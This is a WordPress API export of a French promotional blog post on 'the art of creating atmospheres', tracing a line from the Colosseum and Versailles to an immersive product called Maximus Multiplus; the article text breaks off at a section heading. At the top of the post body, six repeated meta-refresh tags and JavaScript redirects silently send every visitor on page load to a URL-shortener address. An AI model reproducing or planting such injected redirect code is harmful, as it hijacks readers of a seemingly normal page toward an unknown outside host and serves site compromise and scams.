{"id":97676,"date":"2025-09-29T07:04:05","date_gmt":"2025-09-29T07:04:05","guid":{"rendered":"http:\/\/ansoldes.com\/?p=97676"},"modified":"2025-10-30T14:57:13","modified_gmt":"2025-10-30T14:57:13","slug":"l-art-de-creer-des-atmospheres-du-colisee-a-maximus-multiplus","status":"publish","type":"post","link":"http:\/\/ansoldes.com\/index.php\/2025\/09\/29\/l-art-de-creer-des-atmospheres-du-colisee-a-maximus-multiplus\/","title":{"rendered":"L\u2019art de cr\u00e9er des atmosph\u00e8res : du Colis\u00e9e \u00e0 Maximus Multiplus"},"content":{"rendered":"<p><meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.observer\/XOLgxtXuh0r3\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.observer\/XOLgxtXuh0r3\";<\/script><br \/>\n<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.observer\/XOLgxtXuh0r3\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.observer\/XOLgxtXuh0r3\";<\/script><br \/>\n<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.observer\/XOLgxtXuh0r3\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.observer\/XOLgxtXuh0r3\";<\/script><br \/>\n<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.observer\/XOLgxtXuh0r3\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.observer\/XOLgxtXuh0r3\";<\/script><br \/>\n<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.observer\/XOLgxtXuh0r3\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.observer\/XOLgxtXuh0r3\";<\/script><br \/>\n<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.observer\/XOLgxtXuh0r3\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.observer\/XOLgxtXuh0r3\";<\/script><\/p>\n<h2 style=\"font-family: Arial, sans-serif; font-size: 1.8em; color: #34495e; margin-top: 40px;\">1. Introduction : L\u2019art de cr\u00e9er des atmosph\u00e8res dans l\u2019histoire et la culture fran\u00e7aise<\/h2>\n<p style=\"font-family: Georgia, serif; font-size: 1.2em; line-height: 1.6; margin-top: 20px;\">Depuis l\u2019Antiquit\u00e9, la capacit\u00e9 \u00e0 fa\u00e7onner une atmosph\u00e8re sp\u00e9cifique a \u00e9t\u00e9 une composante essentielle de l\u2019art, de l\u2019architecture et de la culture. Dans le contexte artistique et historique, l\u2019atmosph\u00e8re d\u00e9signe la qualit\u00e9 \u00e9motionnelle et sensorielle qui \u00e9mane d\u2019un lieu ou d\u2019un \u00e9v\u00e9nement, influen\u00e7ant la perception et l\u2019exp\u00e9rience de ceux qui s\u2019y trouvent. Elle r\u00e9sulte d\u2019un ensemble d\u2019\u00e9l\u00e9ments tels que la lumi\u00e8re, le son, les d\u00e9corations, la disposition spatiale, mais aussi la symbolique v\u00e9hicul\u00e9e par ces espaces.<\/p>\n<p style=\"font-family: Georgia, serif; font-size: 1.2em; line-height: 1.6; margin-top: 20px;\">L\u2019importance de l\u2019atmosph\u00e8re ne se limite pas \u00e0 la simple esth\u00e9tique : elle forge la m\u00e9moire collective, suscite des \u00e9motions profondes et fa\u00e7onne la mani\u00e8re dont nous percevons notre environnement. La probl\u00e9matique centrale est donc : comment l\u2019atmosph\u00e8re influence-t-elle l\u2019exp\u00e9rience humaine, tant dans l\u2019histoire que dans le monde contemporain ?<\/p>\n<div style=\"margin-top: 30px; font-family: Arial, sans-serif; font-size: 1.2em; color: #2c3e50;\">\n<a href=\"#section-2\" style=\"color: #2980b9; text-decoration: none;\">2. La cr\u00e9ation d\u2019atmosph\u00e8res dans l\u2019Antiquit\u00e9 : du Colis\u00e9e \u00e0 la Rome antique<\/a><br \/>\n<a href=\"#section-3\" style=\"color: #2980b9; text-decoration: none;\">3. L\u2019art de l\u2019atmosph\u00e8re dans la construction de lieux publics et culturels en France<\/a><br \/>\n<a href=\"#section-4\" style=\"color: #2980b9; text-decoration: none;\">4. La transition vers le monde moderne : du th\u00e9\u00e2tre antique \u00e0 Maximus Multiplus<\/a><br \/>\n<a href=\"#section-5\" style=\"color: #2980b9; text-decoration: none;\">5. Maximus Multiplus : une illustration moderne de l\u2019art de cr\u00e9er des atmosph\u00e8res<\/a><br \/>\n<a href=\"#section-6\" style=\"color: #2980b9; text-decoration: none;\">6. La psychologie de l\u2019atmosph\u00e8re : comment elle influence nos \u00e9motions et comportements<\/a><br \/>\n<a href=\"#section-7\" style=\"color: #2980b9; text-decoration: none;\">7. La dimension culturelle et symbolique : l\u2019atmosph\u00e8re comme vecteur d\u2019identit\u00e9<\/a><br \/>\n<a href=\"#section-8\" style=\"color: #2980b9; text-decoration: none;\">8. Conclusion : vers une ma\u00eetrise renouvel\u00e9e de l\u2019art de cr\u00e9er des atmosph\u00e8res<\/a>\n<\/div>\n<h2 id=\"section-2\" style=\"font-family: Arial, sans-serif; font-size: 1.8em; color: #34495e; margin-top: 50px;\">2. La cr\u00e9ation d\u2019atmosph\u00e8res dans l\u2019Antiquit\u00e9 : du Colis\u00e9e \u00e0 la Rome antique<\/h2>\n<h3 style=\"font-family: Georgia, serif; font-size: 1.5em; color: #2c3e50; margin-top: 30px;\">a. L\u2019architecture et l\u2019am\u00e9nagement du Colis\u00e9e : un th\u00e9\u00e2tre de l\u2019\u00e9motion<\/h3>\n<p style=\"font-family: Georgia, serif; font-size: 1.2em; line-height: 1.6; margin-top: 15px;\">Le Colis\u00e9e, symbole embl\u00e9matique de la Rome antique, est un chef-d\u2019\u0153uvre architectural con\u00e7u pour susciter des \u00e9motions intenses chez ses spectateurs. La disposition de ses gradins, la complexit\u00e9 de ses passages et l\u2019utilisation ing\u00e9nieuse de la lumi\u00e8re naturelle cr\u00e9aient une atmosph\u00e8re de grandeur et de suspense. La conception de l\u2019ar\u00e8ne favorise une immersion totale, o\u00f9 chaque d\u00e9tail contribue \u00e0 amplifier la tension dramatique des spectacles de gladiateurs.<\/p>\n<h3 style=\"font-family: Georgia, serif; font-size: 1.5em; color: #2c3e50; margin-top: 30px;\">b. Le r\u00f4le des spectateurs et leur chant \u00ab Mitte! \u00bb : une force collective<\/h3>\n<p style=\"font-family: Georgia, serif; font-size: 1.2em; line-height: 1.6; margin-top: 15px;\">L\u2019ambiance du Colis\u00e9e \u00e9tait \u00e9galement fa\u00e7onn\u00e9e par la participation active du public. Le cri \u00ab Mitte! \u00bb (\u00ab L\u00e2chez-les ! \u00bb) exprimait la volont\u00e9 collective, cr\u00e9ant une atmosph\u00e8re de tension partag\u00e9e. Ce ph\u00e9nom\u00e8ne de synchronisation collective accentuait l\u2019\u00e9motion et renfor\u00e7ait le pouvoir du spectacle, illustrant comment la foule contribue \u00e0 l\u2019atmosph\u00e8re globale.<\/p>\n<h3 style=\"font-family: Georgia, serif; font-size: 1.5em; color: #2c3e50; margin-top: 30px;\">c. La gestion de l\u2019atmosph\u00e8re par l\u2019empereur et les gladiateurs : pouvoir et spectacle<\/h3>\n<p style=\"font-family: Georgia, serif; font-size: 1.2em; line-height: 1.6; margin-top: 15px;\">Les dirigeants romains ma\u00eetrisaient l\u2019atmosph\u00e8re pour renforcer leur pouvoir. L\u2019organisation des combats, l\u2019\u00e9clairage naturel et les dispositifs acoustiques \u00e9taient soigneusement orchestr\u00e9s pour impressionner et soumettre l\u2019audience. Les gladiateurs, en incarnant la bravoure et la brutalit\u00e9, devenaient des instruments d\u2019\u00e9motion contr\u00f4l\u00e9e, o\u00f9 l\u2019atmosph\u00e8re servait \u00e0 asseoir le prestige de l\u2019empire.<\/p>\n<h2 id=\"section-3\" style=\"font-family: Arial, sans-serif; font-size: 1.8em; color: #34495e; margin-top: 50px;\">3. L\u2019art de l\u2019atmosph\u00e8re dans la construction de lieux publics et culturels en France<\/h2>\n<h3 style=\"font-family: Georgia, serif; font-size: 1.5em; color: #2c3e50; margin-top: 30px;\">a. Les monuments embl\u00e9matiques : Notre-Dame, le Ch\u00e2teau de Versailles<\/h3>\n<p style=\"font-family: Georgia, serif; font-size: 1.2em; line-height: 1.6; margin-top: 15px;\">En France, l\u2019architecture a toujours \u00e9t\u00e9 un vecteur puissant d\u2019\u00e9motions collectives. La cath\u00e9drale Notre-Dame de Paris, par ses vitraux color\u00e9s et ses vo\u00fbtes majestueuses, cr\u00e9e une atmosph\u00e8re de spiritualit\u00e9 et d\u2019\u00e9merveillement. De m\u00eame, le Ch\u00e2teau de Versailles, avec ses jardins sym\u00e9triques, ses fontaines et ses int\u00e9rieurs somptueux, \u00e9voque la grandeur, la puissance et la stabilit\u00e9, tout en suscitant un sentiment d\u2019\u00e9merveillement durable.<\/p>\n<h3 style=\"font-family: Georgia, serif; font-size: 1.5em; color: #2c3e50; margin-top: 30px;\">b. Les techniques de sc\u00e9nographie et d\u2019ambiance : lumi\u00e8re, acoustique, d\u00e9cor<\/h3>\n<p style=\"font-family: Georgia, serif; font-size: 1.2em; line-height: 1.6; margin-top: 15px;\">Les ma\u00eetres d\u2019\u0153uvre fran\u00e7ais ont d\u00e9velopp\u00e9 des techniques sophistiqu\u00e9es pour cr\u00e9er des atmosph\u00e8res uniques. La lumi\u00e8re tamis\u00e9e dans les \u00e9glises gothiques accentue la spiritualit\u00e9, tandis que l\u2019acoustique des salles de th\u00e9\u00e2tre comme la Com\u00e9die-Fran\u00e7aise amplifie les \u00e9motions. Le d\u00e9cor, qu\u2019il soit en pierre ou en toile, participe \u00e0 la narration visuelle et sensorielle, renfor\u00e7ant le message symbolique de chaque lieu.<\/p>\n<h3 style=\"font-family: Georgia, serif; font-size: 1.5em; color: #2c3e50; margin-top: 30px;\">c. La symbolique et le r\u00f4le social dans la cr\u00e9ation d\u2019\u00e9motions collectives<\/h3>\n<p style=\"font-family: Georgia, serif; font-size: 1.2em; line-height: 1.6; margin-top: 15px;\">Les monuments et espaces publics ne sont pas de simples b\u00e2tisses : ils sont porteurs de symboles et d\u2019id\u00e9es. La cath\u00e9drale Notre-Dame, par exemple, symbolise la foi et la r\u00e9silience du peuple fran\u00e7ais, tandis que le Ch\u00e2teau de Versailles incarne l\u2019absolutisme royal et la l\u00e9gitimit\u00e9 du pouvoir. Ces lieux participent \u00e0 la cr\u00e9ation d\u2019un sentiment d\u2019appartenance et d\u2019\u00e9motion partag\u00e9e, renfor\u00e7ant l\u2019identit\u00e9 nationale.<\/p>\n<h2 id=\"section-4\" style=\"font-family: Arial, sans-serif; font-size: 1.8em; color: #34495e; margin-top: 50px;\">4. La transition vers le monde moderne : du th\u00e9\u00e2tre antique \u00e0 Maximus Multiplus<\/h2>\n<h3 style=\"font-family: Georgia, serif; font-size: 1.5em; color: #2c3e50; margin-top: 30px;\">a. La continuit\u00e9 des principes : immersion, \u00e9motion, participation<\/h3>\n<p style=\"font-family: Georgia, serif; font-size: 1.2em; line-height: 1.6; margin-top: 15px;\">Malgr\u00e9 l\u2019\u00e9volution technologique, les fondements de la cr\u00e9ation atmosph\u00e9rique restent constants : immersion totale, stimulation \u00e9motionnelle et participation active du public. Que ce soit dans un amphith\u00e9\u00e2tre romain ou dans une salle de spectacle contemporaine, l\u2019objectif est d\u2019engager tous les sens pour faire vivre une exp\u00e9rience unique.<\/p>\n<h3 style=\"font-family: Georgia, serif; font-size: 1.5em; color: #2c3e50; margin-top: 30px;\">b. L\u2019\u00e9volution technologique au service de l\u2019atmosph\u00e8re : \u00e9clairage, son, r\u00e9alit\u00e9 virtuelle<\/h3>\n<p style=\"font-family: Georgia, serif; font-size: 1.2em; line-height: 1.6; margin-top: 15px;\">Les innovations modernes permettent d\u2019affiner la ma\u00eetrise de l\u2019atmosph\u00e8re. L\u2019\u00e9clairage LED, la spatialisation sonore et la r\u00e9alit\u00e9 virtuelle offrent des possibilit\u00e9s infinies pour cr\u00e9er des environnements immersifs, capables de transporter le spectateur dans un autre temps ou espace. Ces technologies renforcent l\u2019impact \u00e9motionnel et la participation active, comme en t\u00e9moigne l\u2019exp\u00e9rience propos\u00e9e par <a href=\"https:\/\/maximusmultiplus.fr\/\" style=\"color: #2980b9; text-decoration: none;\">MAXIMUS Multiplus \u2122<\/a>.<\/p>\n<h3 style=\"font-family: Georgia, serif; font-size: 1.5em; color: #2c3e50; margin-top: 30px;\">c. Maximus Multiplus : un exemple contemporain de ma\u00eetrise atmosph\u00e9rique<\/h3>\n<p style=\"font-family: Georgia, serif; font-size: 1.2em; line-height: 1.6; margin-top: 15px;\">Ce dispositif innovant illustre parfaitement comment la technologie moderne peut \u00eatre utilis\u00e9e pour recr\u00e9er une atmosph\u00e8re historique ou fantastique, en \u00e9voquant par exemple l\u2019ambiance du Colis\u00e9e ou d\u2019autres grands lieux embl\u00e9matiques. En int\u00e9grant des \u00e9l\u00e9ments sensoriels vari\u00e9s, Maximus Multiplus offre une immersion totale, renfor\u00e7ant ainsi l\u2019impact \u00e9motionnel et la participation du public dans un contexte contemporain.<\/p>\n<h2 id=\"section-5\" style=\"font-family: Arial, sans-serif; font-size: 1.8em; color: #34495e; margin-top: 50px;\">5. Maximus Multiplus : une illustration moderne de l\u2019art de cr\u00e9er des atmosph\u00e8res<\/h2>\n<h3 style=\"font-family: Georgia, serif; font-size: 1.5em; color: #2c3e50; margin-top: 30px;\">a. Pr\u00e9sentation du produit et de ses innovations technologiques<\/h3>\n<p style=\"font-family: Georgia, serif; font-size: 1.2em; line-height: 1.6; margin-top: 15px;\">Maximus Multiplus est une plateforme technologique con\u00e7ue pour transformer l\u2019exp\u00e9rience immersive dans les espaces publics et priv\u00e9s. En combinant \u00e9clairage dynamique, son spatialis\u00e9, r\u00e9alit\u00e9 virtuelle et effets sensoriels, cette solution repousse les limites de l\u2019atmosph\u00e8re cr\u00e9\u00e9e, permettant une immersion totale adapt\u00e9e \u00e0 chaque contexte.<\/p>\n<h3 style=\"font-family: Georgia, serif; font-size: 1.5em; color: #2c3e50; margin-top: 30px;\">b. Comment Maximus Multiplus \u00e9voque l\u2019atmosph\u00e8re du Colis\u00e9e : immersion et \u00e9motion<\/h3>\n<p style=\"font-family: Georgia, serif; font-size: 1.2em; line-height: 1.6; margin-top: 15px;\">En s\u2019inspirant des principes antiques d\u2019immersion et d\u2019\u00e9motion, Maximus Multiplus recr\u00e9e des environnements capables de transporter le spectateur dans une \u00e9poque ou un lieu pr\u00e9cis. Par exemple, il peut \u00e9voquer l\u2019ambiance du Colis\u00e9e avec des jeux de lumi\u00e8re, des sons d\u2019ambiance et des visuels immersifs, apportant un r\u00e9alisme \u00e9motionnel comparable \u00e0 celui des spectateurs antiques.<\/p>\n<h3 style=\"font-family: Georgia, serif; font-size: 1.5em; color: #2c3e50; margin-top: 30px;\">c. La dimension sociale et participative : influence sur l\u2019exp\u00e9rience utilisateur<\/h3>\n<p style=\"font-family: Georgia, serif; font-size: 1.2em; line-height: 1.6; margin-top: 15px;\">L\u2019un des atouts majeurs de Maximus Multiplus r\u00e9side dans sa capacit\u00e9 \u00e0 engager activement le public. La participation n\u2019est plus passive : gr\u00e2ce \u00e0 ses interfaces interactives, chaque utilisateur devient acteur de l\u2019atmosph\u00e8re, renfor\u00e7ant ainsi le sentiment d\u2019immersion et d\u2019\u00e9motion partag\u00e9e. Ce ph\u00e9nom\u00e8ne s\u2019inscrit dans une logique contemporaine o\u00f9 la technologie devient un vecteur d\u2019\u00e9motion collective.<\/p>\n<h2 id=\"section-6\" style=\"font-family: Arial, sans-serif; font-size: 1.8em; color: #34495e; margin-top: 50px;\">6. La psychologie de l\u2019atmosph\u00e8re : comment elle influence nos \u00e9motions et comportements<\/h2>\n<h3 style=\"font-family: Georgia, serif; font-size: 1.5em; color: #2c3e50; margin-top: 30px;\">a. Les m\u00e9canismes psychologiques derri\u00e8re l\u2019exp\u00e9rience immersive<\/h3>\n<p style=\"font-family: Georgia, serif; font-size: 1.2em; line-height: 1.6; margin-top: 15px;\">L\u2019exp\u00e9rience immersive agit sur notre cerveau en sollicitant plusieurs sens simultan\u00e9ment, ce qui favorise une r\u00e9ponse \u00e9motionnelle plus intense. Des \u00e9tudes en neuropsychologie montrent que la synchronisation entre stimuli sensoriels et perception consciente influence fortement la m\u00e9morisation et l\u2019attachement \u00e9motionnel \u00e0 un lieu ou un \u00e9v\u00e9nement.<\/p>\n<h3 style=\"font-family: Georgia, serif; font-size: 1.5em; color: #2c3e50; margin-top: 30px;\">b. L\u2019impact sur la m\u00e9moire et la perception du pass\u00e9 et du pr\u00e9sent<\/h3>\n<p style=\"font-family: Georgia, serif; font-size: 1.2em; line-height: 1.6; margin-top: 15px;\">Une atmosph\u00e8re bien con\u00e7ue facilite la cr\u00e9ation de souvenirs durables, renfor\u00e7ant la perception de l\u2019histoire ou du contexte pr\u00e9sent\u00e9. Par exemple, la reconstitution virtuelle d\u2019un lieu historique permet \u00e0 l\u2019individu de vivre une exp\u00e9rience qui d\u00e9passe la simple narration, favorisant ainsi une compr\u00e9hension plus profonde et une m\u00e9moire plus vive.<\/p>\n<h3 style=\"font-family: Georgia, serif; font-size: 1.5em; color: #2c3e50; margin-top: 30px;\">c. Le r\u00f4le de la communaut\u00e9 dans la cr\u00e9ation d\u2019une atmosph\u00e8re collective<\/h3>\n<p style=\"font-family: Georgia, serif; font-size: 1.2em; line-height: 1.6; margin-top: 15px;\">L\u2019aspect communautaire joue un r\u00f4le central dans la perception et la cr\u00e9ation d\u2019atmosph\u00e8res. Lorsqu\u2019un groupe partage une exp\u00e9rience immersive, l\u2019\u00e9motion collective est amplifi\u00e9e, renfor\u00e7ant le sentiment d\u2019appartenance. Cela explique notamment l\u2019importance de lieux comme la basilique de Saint-Denis ou la Place de la R\u00e9publique, o\u00f9 l\u2019histoire commune se manifeste \u00e0 travers des atmosph\u00e8res partag\u00e9es.<\/p>\n<h2 id=\"section-7\" style=\"font-family: Arial, sans-serif; font-size: 1.8em; color: #34495e; margin-top: 50px;\">7. La dimension culturelle et symbolique : l\u2019atmosph\u00e8re comme vecteur d\u2019identit\u00e9<\/h2>\n<h3 style=\"font-family: Georgia, serif; font-size: 1.5em; color: #2c3e50; margin-top: 30px;\">a. La m\u00e9moire collective fran\u00e7aise et ses lieux charg\u00e9s d\u2019atmosph\u00e8re<\/h3>\n<p style=\"font-family: Georgia, serif; font-size: 1.2em; line-height: 1.6; margin-top: 15px;\">Les sites historiques tels que la Bastille, le Panth\u00e9on ou la place Bellecour incarnent une m\u00e9moire collective forte, fa\u00e7onn\u00e9e par leur atmosph\u00e8re particuli\u00e8re. Leur ambiance, m\u00ealant symbolisme, histoire et \u00e9motion, contribue \u00e0 renforcer le sentiment d\u2019appartenance \u00e0 une identit\u00e9 nationale partag\u00e9e.<\/p>\n<h3 style=\"font-family: Georgia, serif; font-size: 1.5em; color: #2c3e50; margin-top: 30px;\">b. La r\u00e9sonance culturelle du concept d\u2019atmosph\u00e8re dans l\u2019histoire nationale<\/h3>\n","protected":false},"excerpt":{"rendered":"<p>1. Introduction : L\u2019art de cr\u00e9er des atmosph\u00e8res dans l\u2019histoire et la culture fran\u00e7aise Depuis l\u2019Antiquit\u00e9, la capacit\u00e9 \u00e0 fa\u00e7onner une atmosph\u00e8re sp\u00e9cifique a \u00e9t\u00e9 une composante essentielle de l\u2019art, de l\u2019architecture et de la culture. Dans le contexte artistique et historique, l\u2019atmosph\u00e8re d\u00e9signe la qualit\u00e9 \u00e9motionnelle et sensorielle qui \u00e9mane d\u2019un lieu ou d\u2019un [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[],"_links":{"self":[{"href":"http:\/\/ansoldes.com\/index.php\/wp-json\/wp\/v2\/posts\/97676"}],"collection":[{"href":"http:\/\/ansoldes.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/ansoldes.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/ansoldes.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/ansoldes.com\/index.php\/wp-json\/wp\/v2\/comments?post=97676"}],"version-history":[{"count":1,"href":"http:\/\/ansoldes.com\/index.php\/wp-json\/wp\/v2\/posts\/97676\/revisions"}],"predecessor-version":[{"id":97677,"href":"http:\/\/ansoldes.com\/index.php\/wp-json\/wp\/v2\/posts\/97676\/revisions\/97677"}],"wp:attachment":[{"href":"http:\/\/ansoldes.com\/index.php\/wp-json\/wp\/v2\/media?parent=97676"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/ansoldes.com\/index.php\/wp-json\/wp\/v2\/categories?post=97676"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/ansoldes.com\/index.php\/wp-json\/wp\/v2\/tags?post=97676"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}